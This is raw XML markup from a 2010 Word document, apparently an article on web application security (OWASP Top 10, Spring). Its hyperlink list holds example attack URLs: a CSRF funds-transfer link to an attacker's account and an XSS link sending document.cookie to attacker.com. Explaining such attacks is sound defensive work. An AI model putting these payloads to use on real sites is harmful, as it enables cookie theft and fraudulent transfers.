            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="287319278">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1289584378">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1642926803">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1098061970">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="541940169">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="218130636">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="192688853">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="977612551">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="677392650">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1797599612">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1794209007">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="372310220">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="410976943">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="229971643">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="93788106">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="598952769">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="303898631">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1050107979">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1372345983">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1856267331">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1986426922">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="160242558">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="962611327">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1353607968">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1310548878">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1774206522">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1357466617">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="458576068">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="395592847">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="794758749">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="309478544">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1731536626">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="892740539">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1314798814">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="877157741">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1009915144">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1370914529">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1046225027">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1047996821">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1206328335">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1231816807">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1404765798">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1549298502">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1558276141">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1596665934">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1779639136">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1848403209">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1920362333">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1969431356">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="197178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appfuse.org/display/APF/Using+Spring+MVC" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://example.com/app/transferFunds?amount=1500&amp;destinationAccount=4673243243" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.kb.cert.org/vuls/id/264385" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/images/0/0f/OWASP_T10_-_2010_rc1.pdf" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://appfuse.org/display/APF/Persistence" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/images/0/0f/OWASP_T10_-_2010_rc1.pdf" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.kb.cert.org/CERT_WEB%5Cservices%5Cvul-notes.nsf/bymetric?open&amp;start=9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isecurity.org/en-us/?route=downloads.multiform" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.milw0rm.com/author/677" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.ouncelabs.com/writable/resources/file/ounce_springframework_vulnerabilities.pdf" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.wellsfargo.com/" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.grammarmudge.cityslide.com/articles/article/426348/2805.htm" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://example.com/app/transferFunds?amount=1500&amp;destinationAccount=attackersAcct" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.attacker.com/cgi-bin/cookie.cgi?'+document.cookie" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.google.com" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.kb.cert.org/vuls/id/643049" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.nytimes.com" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://example.com/transferFunds?amount=1500&amp;destinationAccount=attackersAcct" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.attacker.com/cgi-bin/cookie.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4124</TotalTime>
  <Pages>19</Pages>
  <Words>5990</Words>
  <Characters>34146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dwichers</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>dwichers</cp:lastModifiedBy>
  <cp:revision>21</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2010-03-18T20:07:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2010-03-22T15:53:00Z</dcterms:modified>
</cp:coreProperties>
</file>